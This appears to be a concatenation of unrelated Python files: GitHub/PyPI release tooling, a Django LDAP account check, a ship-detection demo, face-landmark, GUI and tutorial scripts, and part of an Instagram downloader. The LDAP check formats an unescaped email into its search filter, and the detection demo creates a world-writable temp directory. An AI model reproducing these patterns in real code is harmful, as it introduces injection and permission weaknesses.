slack_matches = [(slack_user, match_for_user(slack_user)) for slack_user in slack_users]
slack_matches = [(slack_user, match) for (slack_user, match) in slack_matches if match >= threshold]
if slack_matches:
matched_user = max(slack_matches, key=lambda pair: pair[1])[0]
return format_user_id(matched_user['id'])
else:
return author_name
def now_in_utc():
"""
Returns:
Returns current datetime in UTC
"""
return datetime.now(tz=timezone.utc)
def url_with_access_token(github_access_token, repo_url):
"""
Inserts the access token into the URL
Returns:
str: The URL formatted with an access token
"""
org, repo = get_org_and_repo(repo_url)
return "https://{token}@github.com/{org}/{repo}.git".format(
token=github_access_token,
org=org,
repo=repo,
)
def parse_date(date_string):
"""
Parse a string into a date object
Args:
date_string (str): A date string
Returns:
date: A date object
"""
return parse(date_string).date()
@asynccontextmanager
async def virtualenv(python_interpreter, env):
"""
Create a virtualenv and work within its context
"""
with TemporaryDirectory() as virtualenv_dir:
await check_call(["virtualenv", virtualenv_dir, "-p", python_interpreter], env=env, cwd=virtualenv_dir)
# Figure out what environment variables we need to set
output_bytes = await check_output(
". {}; env".format(os.path.join(virtualenv_dir, "bin", "activate")),
shell=True,
cwd=virtualenv_dir,
)
output = output_bytes.decode()
yield virtualenv_dir, dict(line.split("=", 1) for line in output.splitlines())
async def upload_to_pypi(*, repo_info, testing, version, github_access_token): # pylint: disable=too-many-locals
"""
Upload a version of a project to PYPI
Args:
repo_info (RepoInfo): The repository info
testing (bool): If true upload to the testing server, else upload to production
version (str): The version of the project to upload
github_access_token (str): The github access token
"""
branch = "v{}".format(version)
# Set up environment variables for uploading to pypi or pypitest
twine_env = {
'TWINE_USERNAME': os.environ['PYPITEST_USERNAME'] if testing else os.environ['PYPI_USERNAME'],
'TWINE_PASSWORD': os.environ['PYPITEST_PASSWORD'] if testing else os.environ['PYPI_PASSWORD'],
}
# This is the python interpreter to use for creating the source distribution or wheel
# In particular if a wheel is specific to one version of python we need to use that interpreter to create it.
python = "python3" if repo_info.python3 else "python2"
async with init_working_dir(github_access_token, repo_info.repo_url, branch=branch) as working_dir:
async with virtualenv("python3", None) as (_, outer_environ):
# Heroku has both Python 2 and 3 installed but the system libraries aren't configured for our use,
# so make a virtualenv.
async with virtualenv(python, outer_environ) as (virtualenv_dir, environ):
# Use the virtualenv binaries to act within that environment
python_path = os.path.join(virtualenv_dir, "bin", "python")
pip_path = os.path.join(virtualenv_dir, "bin", "pip")
twine_path = os.path.join(virtualenv_dir, "bin", "twine")
# Install dependencies. wheel is needed for Python 2. twine uploads the package.
await check_call([pip_path, "install", "wheel", "twine"], env=environ, cwd=working_dir)
# Create source distribution and wheel.
await call([python_path, "setup.py", "sdist"], env=environ, cwd=working_dir)
universal = ["--universal"] if repo_info.python2 and repo_info.python3 else []
build_wheel_args = [python_path, "setup.py", "bdist_wheel", *universal]
await call(build_wheel_args, env=environ, cwd=working_dir)
dist_files = os.listdir(os.path.join(working_dir, "dist"))
if len(dist_files) != 2:
raise Exception("Expected to find one tarball and one wheel in directory")
dist_paths = [os.path.join("dist", name) for name in dist_files]
# Upload to pypi
testing_args = ["--repository-url", "https://test.pypi.org/legacy/"] if testing else []
await check_call(
[twine_path, "upload", *testing_args, *dist_paths],
env={
**environ,
**twine_env,
}, cwd=working_dir
)
def load_repos_info(channel_lookup):
"""
Load repo information from JSON and looks up channel ids for each repo
Args:
channel_lookup (dict): Map of channel names to channel ids
Returns:
list of RepoInfo: Information about the repositories
"""
with open(os.path.join(SCRIPT_DIR, "repos_info.json")) as f:
repos_info = json.load(f)
return [
RepoInfo(
name=repo_info['name'],
repo_url=repo_info.get('repo_url'),
rc_hash_url=(
repo_info['rc_hash_url'] if repo_info.get('project_type') == WEB_APPLICATION_TYPE else None
),
prod_hash_url=(
repo_info['prod_hash_url'] if repo_info.get('project_type') == WEB_APPLICATION_TYPE else None
),
channel_id=channel_lookup[repo_info['channel_name']],
project_type=repo_info.get('project_type'),
python2=repo_info.get('python2'),
python3=repo_info.get('python3'),
announcements=repo_info.get('announcements'),
) for repo_info in repos_info['repos']
]
def next_versions(version):
"""
Create the next minor and patch versions from existing version
Args:
version (str): A version string which is already validated
Returns:
(str, str): A new version with the minor version incremented, and the same with the patch version incremented
"""
old_major, old_minor, patch_version = version.split(".")
new_minor = f"{old_major}.{int(old_minor) + 1}.0"
new_patch = f"{old_major}.{old_minor}.{int(patch_version) + 1}"
return new_minor, new_patch
@asynccontextmanager
async def init_working_dir(github_access_token, repo_url, *, branch=None):
"""Create a new directory with an empty git repo"""
if branch is None:
branch = 'master'
url = url_with_access_token(github_access_token, repo_url)
with TemporaryDirectory() as directory:
# from http://stackoverflow.com/questions/2411031/how-do-i-clone-into-a-non-empty-directory
await check_call(["git", "init", "-q"], cwd=directory)
await check_call(["git", "config", "push.default", "simple"], cwd=directory)
await check_call(["git", "remote", "add", "origin", url], cwd=directory)
await check_call(["git", "fetch", "--tags", "-q"], cwd=directory)
await check_call(["git", "checkout", branch, "-q"], cwd=directory)
yield directory
|
import ldap
from django.conf import settings
from django.utils.encoding import smart_str
import commonware.log
log = commonware.log.getLogger('ldap')
_conn_cache = {}
def connect_ldap():
server = '{host}:{port}'.format(**settings.LDAP)
if server in _conn_cache:
log.debug("using cached LDAP connection")
return _conn_cache[server]
log.info("Initializing new LDAP connection")
l = ldap.initialize(server)
l.network_timeout = settings.LDAP_TIMEOUT
l.timelimit = settings.LDAP_TIMEOUT
l.timeout = settings.LDAP_TIMEOUT
l.simple_bind_s(settings.LDAP['user'], settings.LDAP['password'])
_conn_cache[server] = l
return l
def has_account(email):
try:
l = connect_ldap()
resp = l.search_st(settings.LDAP['search_base'], ldap.SCOPE_SUBTREE,
'(mail={mail})'.format(mail=email), ['mail'], timeout=settings.LDAP_TIMEOUT)
return bool(resp)
except ldap.TIMEOUT:
log.warning("ldap search timed out")
return False
except ldap.NO_SUCH_OBJECT:
log.debug("no account found")
return False
def subscription_has_account(subscription):
return has_account(smart_str(subscription.subscriber.email))
|
def zigzag(text, n):
|
import NvRules
def get_identifier():
return "CPIStallSleeping"
def get_name():
return "CPI Stall 'Sleeping'"
def get_description():
return "Warp stall analysis for 'Sleeping' issues"
def get_section_identifier():
return "WarpStateStats"
def apply(handle):
ctx = NvRules.get_context(handle)
action = ctx.range_by_idx(0).action_by_idx(0)
fe = ctx.frontend()
isSupported = False
ccMajor = action.metric_by_name("device__attribute_compute_capability_major").as_uint64()
ccMinor = action.metric_by_name("device__attribute_compute_capability_minor").as_uint64()
if ccMajor == 7 and ccMinor >= 0:
isSupported = True
issueActive = action.metric_by_name("smsp__issue_active.avg.per_cycle_active").as_double()
warpCyclesPerStall = action.metric_by_name("smsp__average_warps_issue_stalled_sleeping_per_issue_active.ratio").as_double()
warpCyclesPerIssue = action.metric_by_name("smsp__average_warps_active_per_issue_active.ratio").as_double()
if isSupported and issueActive < 0.8 and 0.3 < (warpCyclesPerStall / warpCyclesPerIssue):
message = "On average each warp of this kernel spends {:.1f} cycles being stalled waiting for a thread in the warp to come out of the sleep state. This represents about {:.1f}% of the total average of {:.1f} cycles between issuing two instructions. Reduce the number of executed NANOSLEEP instructions, lower the specified time delay, and attempt to group threads in a way that multiple threads in a warp sleep at the same time.".format(warpCyclesPerStall, 100.*warpCyclesPerStall/warpCyclesPerIssue, warpCyclesPerIssue)
fe.message(NvRules.IFrontend.MsgType_MSG_WARNING, message)
|
# Generated by Django 3.1.4 on 2021-02-12 18:13
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
import phonenumber_field.modelfields
class Migration(migrations.Migration):
dependencies = [
("foodcartapp", "0037_auto_20210125_1833"),
]
operations = [
migrations.CreateModel(
name="Order",
fields=[
(
"id",
models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
("firstname", models.CharField(max_length=100)),
("lastname", models.CharField(max_length=100)),
(
"phonenumber",
phonenumber_field.modelfields.PhoneNumberField(
max_length=128, region="RU"
),
),
("address", models.CharField(max_length=255)),
(
"status",
models.CharField(
choices=[
("Handled", "Обработано"),
("Unhandled", "Необработано"),
],
default="Unhandled",
max_length=125,
),
),
("comment", models.TextField(blank=True)),
(
"registered_at",
models.DateTimeField(default=django.utils.timezone.now),
),
("called_at", models.DateTimeField(blank=True, null=True)),
("delivered_at", models.DateTimeField(blank=True, null=True)),
(
"payment",
models.CharField(
choices=[
("CASH", "Наличными"),
("CARD", "Электронно"),
],
default="CARD",
max_length=125,
),
),
],
options={
"verbose_name": "Заказ",
"verbose_name_plural": "Заказы",
},
),
migrations.CreateModel(
name="OrderItem",
fields=[
(
"id",
models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
("quantity", models.IntegerField()),
("price", models.IntegerField(default=0)),
(
"order",
models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
related_name="items",
to="foodcartapp.order",
),
),
(
"product",
models.ForeignKey(
blank=True,
null=True,
on_delete=django.db.models.deletion.SET_NULL,
to="foodcartapp.product",
),
),
],
options={
"verbose_name": "Позиция заказа",
"verbose_name_plural": "Позиции заказа",
},
),
migrations.AddField(
model_name="order",
name="order_items",
field=models.ManyToManyField(
related_name="order_parent", to="foodcartapp.OrderItem"
),
),
]
|
#!/usr/bin/env python
# --------------------------------------------------------
# Faster R-CNN
# Copyright (c) 2015 Microsoft
# Licensed under The MIT License [see LICENSE for details]
# Written by Ross Girshick
# --------------------------------------------------------
"""
Demo script showing detections in sample images.
See README.md for installation instructions before running.
"""
#import _init_paths
from fast_rcnn.config import cfg, cfg_from_file
from fast_rcnn.test import im_detect
from fast_rcnn.nms_wrapper import nms
from utils.timer import Timer
import matplotlib.pyplot as plt
import matplotlib.image as mpimg
import numpy as np
import scipy.io as sio
import caffe, os, sys, cv2
import argparse
from contextlib import contextmanager
import shutil
from subprocess import Popen, PIPE
import shlex
import tempfile
import re
import time
import fcntl
from timeit import default_timer as timer
from osgeo import gdal
CLASSES = ('__background__',
'ship',
'fast_ship')
NETS = {'vgg16': ('VGG16',
'VGG16_faster_rcnn_final.caffemodel'),
'vgg': ('VGG_CNN_M_1024',
'VGG_faster_rcnn_final.caffemodel'),
'zf': ('ZF',
'ZF_faster_rcnn_final.caffemodel')}
def fileno(file_or_fd):
fd = getattr(file_or_fd, 'fileno', lambda: file_or_fd)()
if not isinstance(fd, int):
raise ValueError("Expected a file (`.fileno()`) or a file descriptor")
return fd
def vis_detections(im, class_name, dets, thresh=0.5):
"""Draw detected bounding boxes."""
inds = np.where(dets[:, -1] >= thresh)[0]
if len(inds) == 0:
return
im = im[:, :, (2, 1, 0)]
fig, ax = plt.subplots(figsize=(12, 12))
ax.imshow(im, aspect='equal')
for i in inds:
bbox = dets[i, :4]
score = dets[i, -1]
ax.add_patch(
plt.Rectangle((bbox[0], bbox[1]),
bbox[2] - bbox[0],
bbox[3] - bbox[1], fill=False,
edgecolor='red', linewidth=3.5)
)
ax.text(bbox[0], bbox[1] - 2,
'{:s} {:.3f}'.format(class_name, score),
bbox=dict(facecolor='blue', alpha=0.5),
fontsize=14, color='white')
ax.set_title(('{} detections with '
'p({} | box) >= {:.1f}').format(class_name, class_name,
thresh),
fontsize=14)
plt.axis('off')
plt.tight_layout()
plt.draw()
def demo(net, im_file):
"""Detect object classes in an image using pre-computed object proposals."""
# compute the file offset from the name
iterEx = re.compile(".*?_(\d+)_(\d+)\.jpg$")
itIter = iterEx.findall(im_file)
if len(itIter) > 0:
xoff = int(itIter[0][0])
yoff = int(itIter[0][1])
else:
print("Bad Filename " + im_file + ". No offsets! Skipping file")
return []
# Load the demo image as gray scale
gim = cv2.imread(im_file, flags= cv2.CV_LOAD_IMAGE_GRAYSCALE)
# convert to rgb repeated in each channel
im = cv2.cvtColor(gim, cv2.COLOR_GRAY2BGR)
# Detect all object classes and regress object bounds
timer = Timer()
timer.tic()
scores, boxes = im_detect(net, im)
timer.toc()
print ('Detection took {:.3f}s for '
'{:d} object proposals').format(timer.total_time, boxes.shape[0])
# Visualize detections for each class
CONF_THRESH = 0.5
NMS_THRESH = 0.3
res = []
for cls_ind, cls in enumerate(CLASSES[1:]):
cls_ind += 1 # because we skipped background
cls_boxes = boxes[:, 4*cls_ind:4*(cls_ind + 1)]
cls_scores = scores[:, cls_ind]
dets = np.hstack((cls_boxes,
cls_scores[:, np.newaxis])).astype(np.float32)
keep = nms(dets, NMS_THRESH)
dets = dets[keep, :]
inds = np.where(dets[:,-1] >= CONF_THRESH)[0]
for i in inds:
bbox = dets[i, :4]
score = dets[i, -1]
res.append(cls + " {0} {1} {2} {3}".format(xoff + bbox[0], yoff + bbox[1], bbox[2] - bbox[0], bbox[3] - bbox[1]))
return res
def parse_args():
"""Parse input arguments."""
parser = argparse.ArgumentParser(description='Faster R-CNN demo')
parser.add_argument('--gpu', dest='gpu_id', help='GPU device id to use [0]',
default=0, type=int)
parser.add_argument('--cpu', dest='cpu_mode',
help='Use CPU mode (overrides --gpu)',
action='store_true')
parser.add_argument('--net', dest='demo_net', help='Network to use [zf]',
choices=NETS.keys(), default='vgg')
parser.add_argument('--cfg', dest='cfg_file',
help='optional config file',
default=None, type=str)
parser.add_argument('--model', dest='model_file',
help='caffe model file',
default=None, type=str)
parser.add_argument('--proto', dest='proto_file',
help='caffe prototext file',
default=None, type=str)
parser.add_argument('--split', dest='split_size',
help='width && height for split up images',
action='store', type=int)
parser.add_argument('--tiles', dest='tile_path',
help='image tile output path',
default=None, type=str)
parser.add_argument('file', help="Image file or dir to process",
type=str)
args = parser.parse_args()
return args
def split_up_file(fname, tempDir, splitSize, maxCnt):
dset = gdal.Open(fname)
width = dset.RasterXSize
height = dset.RasterYSize
baseName = os.path.basename(fname)
tName = os.path.join(tempDir, baseName)
fileList = []
cnt = 1
nname, ext = os.path.splitext(fname)
#Here we assume tif files are 8 bit and ntf are 16 bit
if ext.lower() == '.tif':
bitSize = 8
else:
bitSize = 16
for i in range(0, width, splitSize):
for j in range(0, height, splitSize):
if maxCnt > 0 and cnt > maxCnt:
return fileList
cnt += 1
w = min(i+splitSize, width) - i
h = min(j+splitSize, height) - j
xoff = i
yoff = j
if w < splitSize:
xoff = i - (splitSize - w)
if xoff < 0:
xoff = 0
if h < splitSize:
yoff = j - (splitSize - h)
if yoff < 0:
yoff = 0
tempName = tName + "_" + str(i) + "_" + str(j) + ".jpg"
print("spliting up " + tempName)
with timeout(6):
if bitSize == 16:
transStr = "/home/trbatcha/tools/bin/gdal_translate -of JPEG -ot Byte -scale 64 1024 0 255 -b 1 -srcwin " + str(xoff) + " " + str(yoff) + \
" " + str(splitSize) + " " + str(splitSize) + " " + fname + " " + tempName
else:
transStr = "/home/trbatcha/tools/bin/gdal_translate -of JPEG -ot Byte -b 1 -srcwin " + str(xoff) + " " + str(yoff) + \
" " + str(splitSize) + " " + str(splitSize) + " " + fname + " " + tempName
#result = subprocess.check_output([transStr], shell=True)
args = shlex.split(transStr)
p = Popen(args, stdout=PIPE, stderr=PIPE)
try:
print("calling gdal_translate")
stdout, stderr = p.communicate()
print("gdal_translate complete")
fileList.append(tempName)
print (stderr)
print (stdout)
sys.stdout.flush()
except IOError, e:
if e.errno != errno.EINTR:
raise e
print("Timeout: gdal_translate for image " + \
tempName + " w {0} h {1}".
format(width, height))
#get rid of xml file gdal_translate creates
xmlfile = tempName + ".aux.xml"
if os.path.exists(xmlfile):
os.remove(tempName + ".aux.xml")
return fileList
def doWriteToHDFS(dirname, fname) :
basename = os.path.basename(fname)
hname = os.path.join(dirname, basename)
put = Popen(["hdfs", "dfs", "-put", fname, hname],
stdout=PIPE, stderr = PIPE)
stdout, stderr = put.communicate()
print stderr
return hname
import signal, errno
from contextlib import contextmanager
@contextmanager
def timeout(seconds):
def timeout_handler(signum, frame):
pass
orig_handler = signal.signal(signal.SIGALRM, timeout_handler)
try:
signal.alarm(seconds)
yield
finally:
signal.alarm(0)
signal.signal(signal.SIGALRM, orig_handler)
if __name__ == '__main__':
#debug profiling
import cProfile
save_stdout = sys.stdout
sys.stdout = sys.stderr
#debug force stdout to flush optut
sys.stdout = os.fdopen(sys.stdout.fileno(), "w", 0)
#debug profiling
#profile = cProfile.Profile()
#profile.enable()
cfg.TEST.HAS_RPN = True # Use RPN for proposals
args = parse_args()
if args.cfg_file is not None:
print("using config " + args.cfg_file)
cfg_from_file(args.cfg_file)
if cfg.TRAIN.IS_COLOR == True:
print("We are configured for color")
else:
print("We are configured for b/w")
if args.split_size:
print("We are to split up image by {0}".format(args.split_size))
else:
print("No split applied.")
tiledir = args.tile_path
ifile = args.file
prototxt = os.path.join(cfg.ROOT_DIR, 'models', 'VGG_CNN_M_1024',
'faster_rcnn_end2end', 'test_ships.prototxt')
#caffemodel = os.path.join(cfg.ROOT_DIR, 'output', 'faster_rcnn_end2end',
# 'ak47_train', 'zf_faster_rcnn_iter_70000.caffemodel')
caffemodel = os.path.join(cfg.ROOT_DIR, 'output', 'faster_rcnn_end2end',
'ships_train', 'vgg_cnn_m_1024_faster_rcnn_iter_500000.caffemodel')
if args.model_file is not None:
caffemodel = args.model_file
if args.proto_file is not None:
prototxt = args.proto_file
if not os.path.isfile(caffemodel):
raise IOError(('{:s} not found.\nDid you train it?'
).format(caffemodel))
if args.cpu_mode:
caffe.set_mode_cpu()
else:
caffe.set_mode_gpu()
caffe.set_device(args.gpu_id)
cfg.GPU_ID = args.gpu_id
# Need to redirect stdout since we only want to return the results
tempDir = tempfile.mkdtemp(dir = "/dev/shm")
os.chmod(tempDir, 0o777)
#debug
doDetect = True
detects = []
if args.split_size != None:
fileList = split_up_file(ifile, tempDir, args.split_size, -1)
##debug only do the first one
#fileList = split_up_file(ifile, tempDir, args.split_size, 200)
else:
fileList = [ifile]
if doDetect == True:
# debug
net = caffe.Net(prototxt, caffemodel, caffe.TEST)
print '\n\nLoaded network {:s}'.format(caffemodel)
# Warmup on a dummy image
im = 128 * np.ones((300, 500, 1), dtype=np.uint8)
#im = 128 * np.ones((300, 500, 3), dtype=np.uint8)
for i in xrange(2):
_, _= im_detect(net, im)
for nextf in fileList:
print('detection for ' + nextf)
res = demo(net, nextf)
if res != None and len(res) > 0:
print("we have detection results!")
for d in res:
#We have to use ifile instead of nextf since
#all the geo data is gone from nextf
detects.append((d, ifile))
else:
pass
#debug show all detects
print("Printing detects for {0} detections".format(len(detects)))
for d in detects:
print(d[0])
shutil.rmtree(tempDir)
#debug profiling
#profile.disable()
#profile.print_stats(sort='time')
#putting stdout back so we can output the results
sys.stdout.flush()
sys.stdout = save_stdout
# Write out the result to stdout
for d in detects:
print(d[0])
sys.exit(0)
|
# -*- coding: utf-8 -*-
import dlib
import numpy
from skimage import io
from icevisual.Utils import Marker
maker = Marker()
maker.mark("start")
# 源程序是用sys.argv从命令行参数去获取训练模型,精简版我直接把路径写在程序中了
predictor_path = "./model/shape_predictor_68_face_landmarks.dat"
# 源程序是用sys.argv从命令行参数去获取文件夹路径,再处理文件夹里的所有图片
# 这里我直接把图片路径写在程序里了,每运行一次就只提取一张图片的关键点
faces_path = "./faces/alot.jpg"
# 与人脸检测相同,使用dlib自带的frontal_face_detector作为人脸检测器
detector = dlib.get_frontal_face_detector()
# 使用官方提供的模型构建特征提取器
predictor = dlib.shape_predictor(predictor_path)
maker.mark("image_window")
# 使用dlib提供的图片窗口
win = dlib.image_window()
# 使用skimage的io读取图片
img = io.imread(faces_path)
# 绘制图片
win.clear_overlay()
win.set_image(img)
maker.mark("before_detector")
# 与人脸检测程序相同,使用detector进行人脸检测 dets为返回的结果
dets = detector(img, 1)
maker.mark("after_detector")
maker.distance("start", "image_window")
maker.distance("image_window", "before_detector")
maker.distance("before_detector", "after_detector")
# dets的元素个数即为脸的个数
print("Number of faces detected: {}".format(len(dets)))
# 使用enumerate 函数遍历序列中的元素以及它们的下标
# 下标k即为人脸序号
# left:人脸左边距离图片左边界的距离 ;right:人脸右边距离图片左边界的距离
# top:人脸上边距离图片上边界的距离 ;bottom:人脸下边距离图片上边界的距离
for k, d in enumerate(dets):
print("dets{}".format(d))
print("Detection {}: Left: {} Top: {} Right: {} Bottom: {}".format(
k, d.left(), d.top(), d.right(), d.bottom()))
maker.mark("before_predictor")
# 使用predictor进行人脸关键点识别 shape为返回的结果
shape = predictor(img, d)
maker.mark("after_predictor")
maker.distance("before_predictor", "after_predictor")
# 获取第一个和第二个点的坐标(相对于图片而不是框出来的人脸)
print("Part 0: {}, Part 1: {} ...".format(shape.part(0), shape.part(1)))
# 绘制特征点
win.add_overlay(shape)
# 绘制人脸框
win.add_overlay(dets)
# 也可以这样来获取(以一张脸的情况为例)
# get_landmarks()函数会将一个图像转化成numpy数组,并返回一个68 x2元素矩阵,输入图像的每个特征点对应每行的一个x,y坐标。
def get_landmarks(im):
rects = detector(im, 1)
return numpy.matrix([[p.x, p.y] for p in predictor(im, rects[0]).parts()])
# 多张脸使用的一个例子
def get_landmarks_m(im):
dets = detector(im, 1)
# 脸的个数
print("Number of faces detected: {}".format(len(dets)))
for i in range(len(dets)):
facepoint = np.array([[p.x, p.y] for p in predictor(im, dets[i]).parts()])
for i in range(68):
# 标记点
im[facepoint[i][1]][facepoint[i][0]] = [232, 28, 8]
return im
# 打印关键点矩阵
print("face_landmark:")
print(get_landmarks(img))
# 等待点击
dlib.hit_enter_to_continue() |
import wx
import wx.richtext as rtc
import prefs
import re
from utility import platform
from theme import Theme
class BasePane(rtc.RichTextCtrl):
def __init__(self, parent, connection, style):
rtc.RichTextCtrl.__init__(self, parent, style)
self.connection = connection
self.cols = 0
self.rows = 0
self.basic_style = None
self.theme = Theme.fetch()
self.fg_colour = self.theme.get('foreground')
self.bg_colour = self.theme.get('background')
self.is_dragging = False
self.Clear()
self.restyle_thyself()
self.Bind(wx.EVT_MIDDLE_DOWN , self.paste_with_middle_mouse )
self.Bind(wx.EVT_LEFT_UP , self.left_mouse_up)
self.Bind(wx.EVT_LEFT_DOWN , self.left_mouse_down)
self.Bind(wx.EVT_MOTION , self.mouse_moved)
# reinventing xmouse, one event at a time.
def mouse_moved(self, evt):
self.is_dragging = evt.Dragging()
evt.Skip(True)
def left_mouse_up(self, evt):
if self.is_dragging:
self.is_dragging = False
if prefs.get('use_x_copy_paste'):
if platform == 'linux': wx.TheClipboard.UsePrimarySelection(True)
if self.CanCopy(): self.Copy()
if platform == 'linux': wx.TheClipboard.UsePrimarySelection(False)
evt.Skip(True)
# treat selectin in input/output as mutually exclusive
def left_mouse_down(self, evt):
for pane in (self.connection.output_pane, self.connection.input_pane):
if not self == pane:
pane.SelectNone()
evt.Skip(True)
def paste_with_middle_mouse(self,evt):
if prefs.get('use_x_copy_paste'): self.connection.input_pane.paste_from_selection()
def restyle_thyself(self):
basic_style = rtc.RichTextAttr()
self.theme = Theme.fetch()
basic_style.SetTextColour (self.fg_colour)
basic_style.SetBackgroundColour(self.bg_colour)
self.SetBackgroundColour(self.bg_colour)
self.SetBasicStyle(basic_style)
self.basic_style = basic_style
font = wx.Font(prefs.get('font'))
self.SetFont(font)
# set one-half character's worth of left / top margin
font_width, font_height = self.font_size()
# Apparently Centos' Wx doesn't have this, so commenting it out.
#self.SetMargins((font_width / 2, -1))
self.update_size()
def font_size(self):
font = self.GetFont()
# suss out how big one character is
dc = wx.ScreenDC()
dc.SetFont(font)
return dc.GetTextExtent('M')
#### override in subclasses
def check_for_interesting_keystrokes(self, evt):
pass
def update_size(self, evt = None):
pass
|
# -*- coding:utf-8 -*-
import unittest
from config import application, database, environment
import view
class ViewTestBase(unittest.TestCase):
def setUp(self):
app = application.app
environment.configure('test')
database.configure()
view.register()
import model
model.reset()
self.app = app.test_client()
|
from math import pi
def valikko():
while True:
vastaus = (input("Syötä kuvion alkukirjain, q lopettaa (n/s/y/q): "))
if vastaus == "n":
line = "Syötä neliön sivun pituus: "
nsivu = float(input(line))
mitta = tarkista(nsivu, line)
npiiri, nala = laske_neliö(mitta)
print("Ympärysmitta on {:.2f}".format(npiiri))
print("Pinta-ala on {:.2f}".format(nala))
elif vastaus == "s":
line = "Syötä suorakaiteen sivun 1 pituus: "
ssivu1 = float(input(line))
mitta1 = tarkista(ssivu1, line)
line = "Syötä suorakaiteen sivun 2 pituus: "
ssivu2 = float(input(line))
mitta2 = tarkista(ssivu2, line)
spiiri, sala = laske_suorakaide(mitta1, mitta2)
print("Ympärysmitta on {:.2f}".format(spiiri))
print("Pinta-ala on {:.2f}".format(sala))
elif vastaus == "y":
line = "Syötä ympyrän säde: "
säde = float(input(line))
mitta = tarkista(säde, line)
ypiiri, yala = laske_ympyrä(mitta)
print("Ympärysmitta on {:.2f}".format(ypiiri))
print("Pinta-ala on {:.2f}".format(yala))
elif vastaus == "q":
return
else:
print("Virheellinen syöte, yritä uudelleen!")
print()
def laske_ympyrä(mitta):
ypiiri = float(2 * mitta * pi)
yala = float( pi * mitta ** 2)
return ypiiri, yala
def tarkista(mitta, line):
while mitta <= 0:
mitta = float(input(line))
return mitta
def laske_neliö(mitta):
npiiri = 4* mitta
nala = float(mitta * mitta)
return npiiri, nala
def laske_suorakaide(mitta1, mitta2):
spiiri = float(mitta1*2+mitta2*2)
sala = float(mitta1*mitta2)
return spiiri, sala
def main():
valikko()
print("Näkemiin!")
main() |
#!/usr/bin/env python
# coding: utf-8
# ## Numpy 기초
# - numpy를 사용 : 데이터 사이언스에서 사용하는 중요한 패키지<br> => 행렬(선형대수)
# - numpy 다음에는 <b style="color:red">pandas</b>를 배워서 데이터 전처리 작업을 한다
# <img src="https://upload.wikimedia.org/wikipedia/commons/thumb/1/1a/NumPy_logo.svg/330px-NumPy_logo.svg.png">
# In[4]:
import numpy as np
# ## 1. 숫자 자료 처리하기(기초)
# In[5]:
math1 = 89
math2 = 95
math3 = 75
# In[6]:
m_sum = math1 + math2 + math3
m_avg = m_sum / 3
# In[9]:
print("수학 점수의 합계: {}".format(m_sum))
print("수학 점수의 평균: {}".format(m_avg))
# In[10]:
math4 = 87
# In[11]:
m_sum = math1 + math2 + math3 + math4
m_avg = m_sum / 4
# In[12]:
print("수학 점수의 합계: {}".format(m_sum))
print("수학 점수의 평균: {}".format(m_avg))
# ## 2.리스트 자료형으로 처리
# In[23]:
mlist = [89, 95, 75]
print(mlist)
# In[24]:
m_sum1 = 0
m_avg1 = 0
# In[25]:
# for문을 이용해서 합계 평균 구하기
for e in mlist :
m_sum1 += e
m_avg1 = m_sum1 / len(mlist)
print("수학 점수의 합계: {}".format(m_sum1))
print("수학 점수의 평균: {}".format(m_avg1))
# In[26]:
mlist.append(87)
print(mlist)
# In[28]:
m_sum1 = 0
m_avg1 = 0
# In[29]:
# for문을 이용해서 합계 평균 구하기
for e in mlist :
m_sum1 += e
m_avg1 = m_sum1 / len(mlist)
print("수학 점수의 합계: {}".format(m_sum1))
print("수학 점수의 평균: {}".format(m_avg1))
# In[ ]:
|
import logging
import os
import sys
import json
import time
from contextlib import contextmanager
import requests
from colorama import (Fore, Back, Style)
from tqdm import tqdm
from instascrape.utils import to_datetime
from instascrape.constants import UA
from instascrape.exceptions import InstaScrapeError
logger = logging.getLogger("instascrape")
@contextmanager
def progress(total: int = None, desc: str = None, ascii: bool = True, disable: bool = False):
hide = disable or logger.handlers[1].level < 20 or logger.handlers[1].level >= 40
if hide:
class Dummy:
def dummy(self, *args, **kwargs):
pass
def __getattr__(self, item):
return self.dummy
bar = Dummy()
else:
bar = tqdm(total=total, file=sys.stdout, unit="item", ascii=ascii, dynamic_ncols=True,
desc=("\033[7m" + "[" + desc.center(11) + "]" + Style.RESET_ALL) if desc else (Back.YELLOW + Fore.BLACK + "[" + "Downloading".center(11) + "]" + Style.RESET_ALL),
bar_format="{desc} {percentage:3.0f}%|{bar}| {n_fmt}/{total_fmt} " + Fore.LIGHTBLACK_EX + "[{elapsed}<{remaining}{postfix}]" + Fore.RESET)
try:
yield bar
except (Exception, KeyboardInterrupt):
bar.set_description_str(Back.RED + Fore.BLACK + "[" + "Failed".center(11) + "]" + Style.RESET_ALL)
raise
else:
bar.set_description_str(Back.GREEN + Fore.BLACK + "[" + "Completed".center(11) + "]" + Style.RESET_ALL)
finally:
bar.close()
def _down_from_src(src: str, filename: str, path: str = None) -> str or None:
"""Low-level function to download media from a URL (`src`).
* Called in `download_user_profile_pic`.
* Only downloads mp4 and jpeg.
Arguments:
src: source of media (URL)
filename: filename of the file
path: full path to the download destination
Returns:
path: full path to the download destination
"""
path = path or "./"
path = os.path.abspath(path)
if not os.path.isdir(path):
os.mkdir(path)
f = None
try:
r = requests.get(src, stream=True, headers={"user-agent": UA})
r.raise_for_status()
# Get info of the file
mime = r.headers["Content-Type"]
size = r.headers["Content-Length"]
size_in_kb = int(int(size) / 1000)
if mime == "video/mp4":
ext = ".mp4"
elif mime == "image/jpeg":
ext = ".jpg"
else:
raise InstaScrapeError("Invalid MIME type: {0}.".format(mime))
finish_filename = filename + ext
part_filename = filename + ext + ".part"
# Download
logger.debug("=> [{0}] {1} ({2} kB)".format(finish_filename, mime, size_in_kb))
f = open(os.path.join(path, part_filename), "wb+")
for chunk in r.iter_content(1024):
if chunk:
f.write(chunk)
except Exception as e:
logger.error("Download Error (src: '{0}'): ".format(src) + str(e))
return None
finally:
if f:
f.close()
# rename .part file to its real extension
os.rename(os.path.join(path, part_filename), os.path.join(path, finish_filename))
return path
def _down_structure(structure, dest: str = None, directory: str = None, subdir: str = None, force_subdir: bool = False) -> (str, tuple):
"""Download media of containers of a single structure to `dest`. May deecorate the proccess with progress bar.
- If there is multiple media in the structure, a sub directory will be created to store the media.
* This function calls `down_from_src` function and wraps it with some interactions with Post object to support downloading post.
* Containers are obtained by calling `structure.obtain_media()`.
* Called in `download_story` and `download_post` individualy.
* If a file with the same path and filename found, it will skip the download process.
[dest]
[directory]
[sub directory] (multi or dump_metadata=True)
[file]
...
